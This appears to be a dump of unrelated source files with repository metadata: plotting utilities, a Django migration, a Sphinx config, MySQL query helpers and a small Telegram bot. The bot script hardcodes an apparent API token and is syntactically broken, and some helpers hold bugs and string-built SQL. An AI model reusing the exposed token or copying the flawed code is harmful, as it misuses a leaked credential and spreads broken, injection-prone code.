preprocessor = bob.bio.spear.preprocessor.Energy_2Gauss(max_iterations = 10, convergence_threshold = 0.0005, variance_threshold = 0.0005, win_length_ms = 20., win_shift_ms = 10., smoothing_window = 10)
extractor = bob.bio.spear.extractor.Cepstral(win_length_ms = 25, win_shift_ms = 10, n_filters = 24 , dct_norm = False, f_min = 0, f_max = 4000, delta_win = 2, mel_scale = True, with_energy = True, with_delta = True, with_delta_delta = True, n_ceps = 19, pre_emphasis_coef = 0.97)
algorithm = bob.bio.gmm.algorithm.SVMGMM(number_of_gaussians = 128, kmeans_training_iterations = 10, gmm_training_iterations = 10,
training_threshold = 5e-4, variance_threshold = 5e-4, update_weights = True, update_means = True, update_variances = True, relevance_factor = 4, gmm_enroll_iterations = 1, responsibility_threshold = 0, INIT_SEED = 5489)
#parallel = 40
#verbose = 2 | [
"nathbapt@decom.fee.unicamp.br"
] | nathbapt@decom.fee.unicamp.br |
de9de4589510affd0dcae62be57fd19a0178ca96 | 2baf095631192604a2aabdeeb2aa230b4229076c | /benchmark/plot.py | ce577c556d017b0073c4627b5c3a452d4c50a29d | [] | no_license | ximitiejiang/machine_learning_algorithm | 14ea7cf991381375b6cbe34030a477e6a949abe1 | a26c64a561985444c1fc23db4ab298af255d1177 | refs/heads/master | 2020-03-26T23:02:10.614960 | 2019-12-05T14:54:49 | 2019-12-05T14:54:49 | 145,505,075 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,736 | py | import progressbar
#from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import matplotlib.cm as cmx
import matplotlib.colors as colors
import numpy as np
#from mlfromscratch.utils.data_operation import calculate_covariance_matrix
#from mlfromscratch.utils.data_operation import calculate_correlation_matrix
#from mlfromscratch.utils.data_manipulation import standardize
bar_widgets = [
'Training: ', progressbar.Percentage(), ' ', progressbar.Bar(marker="-", left="[", right="]"),
' ', progressbar.ETA()
]
def calculate_variance(X): # 计算方差
""" Return the variance of the features in dataset X """
mean = np.ones(np.shape(X)) * X.mean(0)
n_samples = np.shape(X)[0]
variance = (1 / n_samples) * np.diag((X - mean).T.dot(X - mean))
return variance
def calculate_std_dev(X): # 计算标准差
""" Calculate the standard deviations of the features in dataset X """
std_dev = np.sqrt(calculate_variance(X))
return std_dev
def standardize(X): # 标准化
""" Standardize the dataset X """
X_std = X
mean = X.mean(axis=0)
std = X.std(axis=0)
for col in range(np.shape(X)[1]):
if std[col]:
X_std[:, col] = (X_std[:, col] - mean[col]) / std[col]
# X_std = (X - X.mean(axis=0)) / X.std(axis=0)
return X_std
def calculate_covariance_matrix(X, Y=None): # 计算协方差矩阵
""" Calculate the covariance matrix for the dataset X """
if Y is None:
Y = X
n_samples = np.shape(X)[0]
covariance_matrix = (1 / (n_samples-1)) * (X - X.mean(axis=0)).T.dot(Y - Y.mean(axis=0))
return np.array(covariance_matrix, dtype=float)
def calculate_correlation_matrix(X, Y=None): # 计算相关系数矩阵
""" Calculate the correlation matrix for the dataset X """
if Y is None:
Y = X
n_samples = np.shape(X)[0]
covariance = (1 / n_samples) * (X - X.mean(0)).T.dot(Y - Y.mean(0))
std_dev_X = np.expand_dims(calculate_std_dev(X), 1)
std_dev_y = np.expand_dims(calculate_std_dev(Y), 1)
correlation_matrix = np.divide(covariance, std_dev_X.dot(std_dev_y.T))
return np.array(correlation_matrix, dtype=float)
class Plot():
def __init__(self):
self.cmap = plt.get_cmap('viridis')
def _transform(self, X, dim):
covariance = calculate_covariance_matrix(X) # 计算协方差covariance
eigenvalues, eigenvectors = np.linalg.eig(covariance) # 计算协方差矩阵的特征值eigenvalues和特征向量eigenvectors
# Sort eigenvalues and eigenvector by largest eigenvalues
idx = eigenvalues.argsort()[::-1] #对特征值从大到小排序
eigenvalues = eigenvalues[idx][:dim] #提取前dim个特征值
eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :dim] # 提取特征值对应特征向量
# Project the data onto principal components
X_transformed = X.dot(eigenvectors) # X*eigenvectors 特征乘以特征向量
return X_transformed
def plot_regression(self, lines, title, axis_labels=None, mse=None, scatter=None, legend={"type": "lines", "loc": "lower right"}):
if scatter:
scatter_plots = scatter_labels = []
for s in scatter:
scatter_plots += [plt.scatter(s["x"], s["y"], color=s["color"], s=s["size"])]
scatter_labels += [s["label"]]
scatter_plots = tuple(scatter_plots)
scatter_labels = tuple(scatter_labels)
for l in lines:
li = plt.plot(l["x"], l["y"], color=s["color"], linewidth=l["width"], label=l["label"])
if mse:
plt.suptitle(title)
plt.title("MSE: %.2f" % mse, fontsize=10)
else:
plt.title(title)
if axis_labels:
plt.xlabel(axis_labels["x"])
plt.ylabel(axis_labels["y"])
if legend["type"] == "lines":
plt.legend(loc="lower_left")
elif legend["type"] == "scatter" and scatter:
plt.legend(scatter_plots, scatter_labels, loc=legend["loc"])
plt.show()
# Plot the dataset X and the corresponding labels y in 2D using PCA.
def plot_in_2d(self, X, y=None, title=None, accuracy=None, legend_labels=None):
X_transformed = self._transform(X, dim=2)
x1 = X_transformed[:, 0]
x2 = X_transformed[:, 1]
class_distr = []
y = np.array(y).astype(int)
colors = [self.cmap(i) for i in np.linspace(0, 1, len(np.unique(y)))]
# Plot the different class distributions
for i, l in enumerate(np.unique(y)):
_x1 = x1[y == l]
_x2 = x2[y == l]
_y = y[y == l]
class_distr.append(plt.scatter(_x1, _x2, color=colors[i]))
# Plot legend
if not legend_labels is None:
plt.legend(class_distr, legend_labels, loc=1)
# Plot title
if title:
if accuracy:
perc = 100 * accuracy
plt.suptitle(title)
plt.title("Accuracy: %.1f%%" % perc, fontsize=10)
else:
plt.title(title)
# Axis labels
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.show()
# Plot the dataset X and the corresponding labels y in 3D using PCA.
def plot_in_3d(self, X, y=None):
X_transformed = self._transform(X, dim=3)
x1 = X_transformed[:, 0]
x2 = X_transformed[:, 1]
x3 = X_transformed[:, 2]
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x1, x2, x3, c=y)
plt.show()
| [
"ximitiejiang@163.com"
] | ximitiejiang@163.com |
7fa07c81e77c3c7452bffd7ef527182c0b399ad3 | 8da91c26d423bacbeee1163ac7e969904c7e4338 | /pyvisdk/do/host_internet_scsi_hba_authentication_capabilities.py | c35666aac4c0338cccda1bb6bc8f959b7d9f3d45 | [] | no_license | pexip/os-python-infi-pyvisdk | 5d8f3a3858cdd61fb76485574e74ae525cdc7e25 | 1aadea0afbc306d09f6ecb9af0e683dbbf961d20 | refs/heads/master | 2023-08-28T02:40:28.789786 | 2020-07-16T04:00:53 | 2020-07-16T04:00:53 | 10,032,240 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def HostInternetScsiHbaAuthenticationCapabilities(vim, *args, **kwargs):
'''The authentication capabilities for this host bus adapter.'''
obj = vim.client.factory.create('{urn:vim25}HostInternetScsiHbaAuthenticationCapabilities')
# do some validation checking...
if (len(args) + len(kwargs)) < 4:
raise IndexError('Expected at least 5 arguments got: %d' % len(args))
required = [ 'chapAuthSettable', 'krb5AuthSettable', 'spkmAuthSettable', 'srpAuthSettable' ]
optional = [ 'mutualChapSettable', 'targetChapSettable', 'targetMutualChapSettable',
'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
| [
"jmb@pexip.com"
] | jmb@pexip.com |
5ae62e7a2aebbe4228d9013bd093f34148deefa5 | d57b51ec207002e333b8655a8f5832ed143aa28c | /.history/nanachi_20200619190147.py | 86f02fde6c3e6677051477be28e1a4ea19c0aee3 | [] | no_license | yevheniir/python_course_2020 | b42766c4278a08b8b79fec77e036a1b987accf51 | a152d400ab4f45d9d98d8ad8b2560d6f0b408c0b | refs/heads/master | 2022-11-15T07:13:24.193173 | 2020-07-11T15:43:26 | 2020-07-11T15:43:26 | 278,890,802 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import telebot
bot = telebot.TeleBot('776550937:AAELEr0c3H6dM-9QnlDD-0Q0Fcd65pPyAiM')
@bot.message_handler(content_types=['text'])
def send_text(message):
if message.text[0].lower() == "н" and :
bot.send_message(message.chat.id, message.text + message.text[1:] )
bot.polling()
def c | [
"yevheniira@intelink-ua.com"
] | yevheniira@intelink-ua.com |
f6ce243146b5a953f28c66da59306e9142735527 | bad0f9497e549d729d342f84d7fae197cccdd198 | /docs/source/conf.py | 77b14d6ed6f15026ed9dce76aebf1bae589ece6e | [
"BSD-3-Clause"
] | permissive | talpor/django-activity-stream | 2f900dc95561d9bdaf23934463524c68bae567de | 8348bec4ee80be2cc19aa17932ecaf81f6df9def | refs/heads/master | 2021-01-15T23:02:45.341247 | 2018-05-17T18:50:50 | 2018-05-17T18:50:50 | 32,185,029 | 0 | 0 | null | 2015-03-13T22:55:08 | 2015-03-13T22:55:06 | Python | UTF-8 | Python | false | false | 5,763 | py | # -*- coding: utf-8 -*-
#
# Django Activity Stream documentation build configuration file, created by
# sphinx-quickstart on Sat Oct 1 12:35:29 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
from datetime import datetime
os.environ['DJANGO_SETTINGS_MODULE'] = 'actstream.runtests.settings'
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../actstream/runtests'))
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../..'))
import django
try:
django.setup()
except AttributeError:
pass
import actstream
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Activity Stream'
copyright = u'2010-%s, Justin Quick. Activity Streams logo released under ' \
u'<a href="http://creativecommons.org/licenses/by/3.0/">Creative Commons 3.0</a>' % datetime.now().year
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = actstream.get_version(False)
# The full version, including alpha/beta/rc tags.
release = actstream.get_version()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'tango'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import alabaster
extensions.append('alabaster')
html_theme_path = [alabaster.get_path()]
html_theme = 'alabaster'
html_sidebars = {
'**': [
'about.html', 'navigation.html', 'searchbox.html', 'donate.html',
]
}
html_static_path = ['_static']
html_theme_options = {
'logo': 'logo.jpg',
'logo_text_align': 'center',
'description': 'Generic activity streams for Django',
'github_user': 'justquick',
'github_repo': 'django-activity-stream',
'travis_button': True,
'gittip_user': 'justquick',
'analytics_id': 'UA-42089198-1'
}
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoActivityStreamdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'DjangoActivityStream.tex', u'Django Activity Stream Documentation',
u'Justin Quick', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangoactivitystream', u'Django Activity Stream Documentation',
[u'Justin Quick'], 1)
]
| [
"justquick@gmail.com"
] | justquick@gmail.com |
5ece19536166f0b866ad549915f7002b119a6b49 | 1b3e62ac5655fbcbb7cf95724354c8e69d487745 | /HSE WEEK 5/HSE 5 Task 31.py | c9619f61ea9d0944c84c7a376de659ef19fa3cc9 | [] | no_license | syth0le/HSE.Python | 7d97f38e9b57825b54ac2576b00731240eef227c | e9a15b1ed5e21d56281e4619a39198d5d2838f0b | refs/heads/master | 2021-01-14T17:35:30.427970 | 2020-03-24T17:23:30 | 2020-03-24T17:23:30 | 242,698,160 | 5 | 1 | null | 2020-03-23T19:41:20 | 2020-02-24T09:43:15 | Python | UTF-8 | Python | false | false | 167 | py | numList = input().split()
for i in range(0, len(numList), 2):
numList[i:i+2] = numList[i:i+2][::-1]
readylist = list(map(str, numList))
print(' '.join(readylist))
| [
"chdan565@gamil.com"
] | chdan565@gamil.com |
7180394060ae55aeb4c339d0562f330eaaf40bca | 56bf6c68e78257e887de9e5eae11fc6652ce7f06 | /bbdd/Scripts/bbdd/productos/migrations/0002_auto_20170313_1111.py | 971ae6caf6b0803bf878e97cde5caee4a2089a6a | [] | no_license | CarlosSanz81/bbdd | 1d1c670e16f0e8ee81fb929767d8f65b7361cbe3 | 3b1febaddfef93fffeb34c3970281e4a37d05146 | refs/heads/master | 2023-01-09T03:20:02.042514 | 2017-03-13T11:07:15 | 2017-03-13T11:07:15 | 84,815,195 | 0 | 1 | null | 2022-12-20T09:00:14 | 2017-03-13T10:45:00 | Python | UTF-8 | Python | false | false | 3,508 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-13 10:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('productos', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='producto',
old_name='descripcion_cliente',
new_name='apellido1',
),
migrations.RenameField(
model_name='producto',
old_name='nombre_cliente',
new_name='apellido2',
),
migrations.RenameField(
model_name='producto',
old_name='presupuesto',
new_name='codigoImprenta',
),
migrations.RenameField(
model_name='producto',
old_name='numero_cliente',
new_name='cp',
),
migrations.RemoveField(
model_name='producto',
name='fijo',
),
migrations.RemoveField(
model_name='producto',
name='image',
),
migrations.RemoveField(
model_name='producto',
name='margen',
),
migrations.RemoveField(
model_name='producto',
name='numero_parte',
),
migrations.AddField(
model_name='producto',
name='direcc',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='fecha',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='producto',
name='movil',
field=models.DecimalField(decimal_places=0, default=0, max_digits=9),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='nombre',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='nombreCompleto',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='pedido',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='poblacion',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='provincia',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='remesa',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='telefono',
field=models.DecimalField(decimal_places=0, default=0, max_digits=9),
preserve_default=False,
),
migrations.AlterField(
model_name='producto',
name='isbn',
field=models.DecimalField(decimal_places=0, max_digits=13),
),
]
| [
"carlossanzgarcia81@gmail.com"
] | carlossanzgarcia81@gmail.com |
62c94db115f11585424e8df49b2baf70d5c8bc4d | 9a486a87e028303a551fbd0d1e1b6b650387ea14 | /propose/anim/me_send/human_skin.py | 23974e36ca1961c8edd87e9707c50518b46b0440 | [] | no_license | shanlihou/pythonFunc | 7b8e7064fddd4522e492c915c086cc6c5abc6eec | 646920256551ccd8335446dd4fe11aa4b9916f64 | refs/heads/master | 2022-08-24T20:33:12.287464 | 2022-07-21T12:00:10 | 2022-07-21T12:00:10 | 24,311,639 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py |
skin = [
('head', (174, 229), 'me.png', True, True, 0.2),
('upper_arm1', (11, 56), 'all.png', True, True, 0.2),
('lower_arm1', (11, 59), 'all.png', True, True, 0.2),
('upper_arm2', (9, 60), 'all.png', True, True, 0.2),
('lower_arm2', (8, 60), 'all.png', True, True, 0.2),
('upper_leg1', (11, 58), 'all.png', True, True, 0.2),
('lower_leg1', (9, 63), 'all.png', True, True, 0.2),
('upper_leg2', (11, 57), 'all.png', True, True, 0.2),
('lower_leg2', (11, 59), 'all.png', True, True, 0.2),
('body', (24, 124), 'all.png', True, True, 0.5),
('cell_phone', (24, 124), 'cellphone.png', True, True, 0.5),
]
| [
"shanlihou@gmail.com"
] | shanlihou@gmail.com |
a99808919eadfeaef81265b7cda8db9b9fd19fe4 | b834509b4d3bf3b9161c3ac9ea2984af17bebf5e | /icvUI/dbsession/panel.py | de24cb4c4d427413ea39deb950f953065b7ee523 | [] | no_license | RichardZhong/meiduo | a338dc6b78da71df60ebff7827c5ba6225081650 | 4d530b4870d3353daaf4b1505998156595055073 | refs/heads/master | 2020-08-22T12:12:07.870793 | 2018-09-26T03:26:49 | 2018-09-26T03:26:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,861 | py | from icvUI.dbsession import *
# 获取属于面板功能的camera
def query_panel_camera():
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT panel_ori.camera_id,description,ori_data FROM camera,panel_ori WHERE FIND_IN_SET('panel',application) AND panel_ori.camera_id = camera.camera_id ORDER BY panel_ori.camera_id;"
cursor.execute(query_sql)
data = cursor.fetchall()
# print(data)
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
def query_panel_label():
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT label_zh FROM panel_label;"
cursor.execute(query_sql)
data = cursor.fetchall()
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
# 获取面板相机第一帧图片
def query_panel_first_frame(camera_id):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT camera_id, frame_img FROM panel_first_frame WHERE camera_id = '{camera_id}';"
cursor.execute(query_sql)
data = cursor.fetchone()
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
# 插入面板数据
def update_panel_data(camera_id, ori_data):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
update_sql = "UPDATE panel_ori SET ori_data = '{}' WHERE camera_id = '{}';".format(ori_data,camera_id)
cursor.execute(update_sql)
conn.commit()
return 'ok'
except Exception as e:
print(e)
return 'wrong'
finally:
cursor.close()
conn.close()
# 获取最新面板结果
def query_latest_panel(camera_id):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT description,panel_result.camera_id,status_type,alarm_data,panel_picture,DATE_FORMAT(time,'%Y-%m-%d %T') AS time,alarm_type FROM camera,panel_result WHERE panel_result.camera_id = '{camera_id}' AND camera.camera_id = panel_result.camera_id ORDER BY time DESC LIMIT 0,1;"
cursor.execute(query_sql)
data = cursor.fetchone()
if not data:
return None
data['alarm_type'] = ",".join(list(data['alarm_type']))
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
# 获取全部面板结果
def query_panel_history(offset,limit,search):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
if search == "正常":
query_sql = "SELECT panel_result.camera_id,status_type,alarm_data,panel_picture,description,alarm_type,DATE_FORMAT(time,'%Y-%m-%d %T') AS time FROM camera,panel_result WHERE panel_result.camera_id = camera.camera_id AND panel_result.status_type = '正常' ORDER BY time DESC;"
elif search == "异常":
query_sql = "SELECT panel_result.camera_id,status_type,alarm_data,panel_picture,description,alarm_type,DATE_FORMAT(time,'%Y-%m-%d %T') AS time FROM camera,panel_result WHERE panel_result.camera_id = camera.camera_id AND panel_result.status_type = '异常' ORDER BY time DESC;"
else:
query_sql = "SELECT panel_result.camera_id,status_type,alarm_data,panel_picture,description,alarm_type,DATE_FORMAT(time,'%Y-%m-%d %T') AS time FROM camera,panel_result WHERE panel_result.camera_id = camera.camera_id ORDER BY time DESC;"
cursor.execute(query_sql)
data = cursor.fetchall()
returndata = data[offset:offset+limit]
for single in returndata:
single['alarm_type'] = ",".join(list(single['alarm_type']))
result = {
'total':len(data),
'rows':returndata
}
return result
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
# 日常拍照时间间隔
def update_panel_interval(interval):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT * FROM panel_daily_time;"
cursor.execute(query_sql)
data = cursor.fetchall()
if len(data) == 0:
insert_sql = "INSERT INTO panel_daily_time(time_interval) VALUES('{interval}');"
cursor.execute(insert_sql)
conn.commit()
else:
update_sql = "UPDATE panel_daily_time SET time_interval = '{interval}';"
cursor.execute(update_sql)
conn.commit()
return 'ok'
except Exception as e:
print(e)
return 'wrong'
finally:
cursor.close()
conn.close()
# 查询日常拍照时间间隔
def query_panel_interval():
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT * FROM panel_daily_time;"
cursor.execute(query_sql)
data = cursor.fetchall()
if len(data) == 0:
data = ''
else:
time_hash = {
"10":"10分钟",
"30":"30分钟",
"60":"1小时",
"120":"2小时",
"180":"3小时"
}
data[0]['time_interval'] = time_hash[data[0]['time_interval']]
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close() | [
"xwp_fullstack@163.com"
] | xwp_fullstack@163.com |
a7c4f424709c906decef7ac3409403229846dd1c | c77a40408bc40dc88c466c99ab0f3522e6897b6a | /Programming_basics/Exercise_7/AgencyProfit.py | a3938967800366d45453b1a08b8b42eed96dad4e | [] | no_license | vbukovska/SoftUni | 3fe566d8e9959d390a61a4845381831929f7d6a3 | 9efd0101ae496290313a7d3b9773fd5111c5c9df | refs/heads/main | 2023-03-09T17:47:20.642393 | 2020-12-12T22:14:27 | 2021-02-16T22:14:37 | 328,805,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | name = input()
elder_tickets = int(input())
child_tickets = int(input())
elder_ticket_price = float(input())
fee = float(input())
elder_fin_price = elder_ticket_price + fee
child_fin_price = elder_ticket_price * 0.3 + fee
total = elder_tickets * elder_fin_price + child_tickets * child_fin_price
profit = total * 0.2
print(f'The profit of your agency from {name} tickets is {profit:.2f} lv.')
| [
"vbukovska@yahoo.com"
] | vbukovska@yahoo.com |
74707c9d2c81498ed5fdb4c8f86098f7a2885d48 | a31de016611f3b4efc7a576e7113cad1a738419b | /2017/turtle_grafik/101computing.net/turtle_clock.py | 807e976a1aea285185ccdd4507415e444013ccf9 | [] | no_license | Ing-Josef-Klotzner/python | 9d4044d632672fff966b28ab80e1ef77763c78f5 | 3913729d7d6e1b7ac72b46db7b06ca0c58c8a608 | refs/heads/master | 2022-12-09T01:40:52.275592 | 2022-12-01T22:46:43 | 2022-12-01T22:46:43 | 189,040,355 | 0 | 0 | null | 2022-12-01T19:52:37 | 2019-05-28T14:05:16 | Python | UTF-8 | Python | false | false | 2,072 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
"""
Created on Mon Sep 25 23:16:54 2017
@author: josef
"""
import turtle, datetime, time
myPen = turtle.Turtle()
myPen.shape("arrow")
myPen.tracer(0)
myPen.speed(0)
myPen.shapesize(.5,1)
turtle.delay(0)
myPen.penup()
myPen.goto(0,-180)
myPen.pendown()
myPen.pensize(3)
myPen.color("blue")
myPen.circle(180)
for wi in range(6,361,6): # 360/60 = 6 -- Sekundenstriche
myPen.penup()
myPen.goto(0,0)
myPen.setheading(wi)
myPen.fd(160)
myPen.pendown()
myPen.fd(10)
myPen.pensize(6)
for wi in range(30,361,30): # 360/60 = 6 -- Minutenstriche
myPen.penup() # bei 3,6,9,12 länger
myPen.goto(0,0)
myPen.setheading(wi)
if wi % 90 == 0:
myPen.fd(155)
myPen.down()
myPen.fd(15)
else:
myPen.fd(160)
myPen.pendown()
myPen.fd(10)
myPen.pensize(3)
while True:
myPen.color("red")
currentSecond = datetime.datetime.now().second
currentMinute = datetime.datetime.now().minute
currentHour = datetime.datetime.now().hour
myPen.penup()
myPen.goto(0,0)
myPen.setheading(90) # Point to the top - 12 o'clock
myPen.right(currentHour*360/12+currentMinute*360/12/60+currentSecond*360/12/60/60)
myPen.pendown()
myPen.pensize(7)
myPen.forward(100)
myPen.stamp()
myPen.penup()
myPen.goto(0,0)
myPen.setheading(90) # Point to the top - 0 minute
myPen.right(currentMinute*360/60+currentSecond*360/60/60)
myPen.pendown()
myPen.pensize(5)
myPen.forward(130)
myPen.stamp()
myPen.color("green")
myPen.penup()
myPen.goto(0,0)
myPen.pensize(7)
myPen.dot()
myPen.pensize(3)
myPen.setheading(90) # Point to the top - 0 minute
myPen.right(currentSecond*360/60)
myPen.pendown()
myPen.forward(140)
myPen.getscreen().update()
time.sleep(.99)
for _ in range(20):
myPen.undo()
# myPen.getscreen().update()
#turtle.done()
| [
"josef.klotzner@gmail.com"
] | josef.klotzner@gmail.com |
c4b6a3f62693ae3839dab962a54b3148f679bc02 | 21c8e8fee35d736938d22bfd01d4f8aa0f81b79e | /app.py | 14a3dc6627e061c994804fbd9b2d09ae8cab479f | [
"MIT"
] | permissive | betatim/etherbrain | 320d4accdc789325b94feafab18aa6e49cea8564 | 910152032825861248cc300b0388c07112fff5db | refs/heads/master | 2021-01-16T21:22:31.676169 | 2016-02-11T17:32:28 | 2016-02-11T17:32:28 | 51,532,606 | 1 | 0 | null | 2016-02-11T17:33:01 | 2016-02-11T17:33:00 | null | UTF-8 | Python | false | false | 2,028 | py | import os
import requests
from github3 import login
from flask import (
Response,
Flask,
g,
request
)
GH_TOKEN = os.getenv("TOKEN")
FORK_ME = """<a href="https://github.com/etherpad-archive/etherbrain"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://camo.githubusercontent.com/365986a132ccd6a44c23a9169022c0b5c890c387/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f7265645f6161303030302e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_right_red_aa0000.png"></a>"""
app = Flask(__name__)
app.debug = True
@app.route('/moz/<path:path>/')
def moz_pad(path):
ether_path = "https://public.etherpad-mozilla.org/p/{}".format(path)
req = requests.get(ether_path + "/export/txt")
gh = login('etherbrain', token=GH_TOKEN)
r = gh.repository('etherpad-archive', 'etherpad-archive.github.io')
contents = r.contents(path='moz')
print(contents)
fname = path + ".md"
if contents is None or fname not in contents:
# create it for the first time
r.create_file("moz/{}.md".format(path),
'etherpad from {}'.format(ether_path),
content=req.content)
else:
# update the file
f = contents[fname]
f.update('updated etherpad from {}'.format(ether_path),
content=req.content)
return Response(
'Check out: <a href="http://etherpad-archive.github.io/moz/{path}.md"'
'>http://etherpad-archive.github.io/moz/{path}.md</a>'.format(path=path)
)
@app.route('/')
def index():
return Response("<html><head><title>Etherpad brain</title></head><body><h1>Hello I am the etherpad brain</h1>"
"<p>To archive https://public.etherpad-mozilla.org/p/XXX visit"
" https://etherbrain.herokuapp.com/moz/XXX/</p>{}</body></html>".format(FORK_ME))
if __name__ == "__main__":
app.run(debug=True)
| [
"betatim@gmail.com"
] | betatim@gmail.com |
ecc34043983b03b3988be9dcd00276282e219b79 | 41523dd4871e8ed1043d2b3ddf73417fcbdde209 | /day10/第三方模块.py | 160b4dccef65869bcc8a653e7c6817dce1eb9e80 | [] | no_license | WayneChen1994/Python1805 | 2aa1c611f8902b8373b8c9a4e06354c25f8826d6 | a168cd3b7749afc326ec4326db413378fd3677d5 | refs/heads/master | 2020-03-30T23:19:00.773288 | 2018-11-02T10:47:40 | 2018-11-02T10:47:40 | 151,697,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 640 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Wayne.Chen
'''
第三方的库都需要安装
第一种:使用pip安装
命令格式:pip install 库名
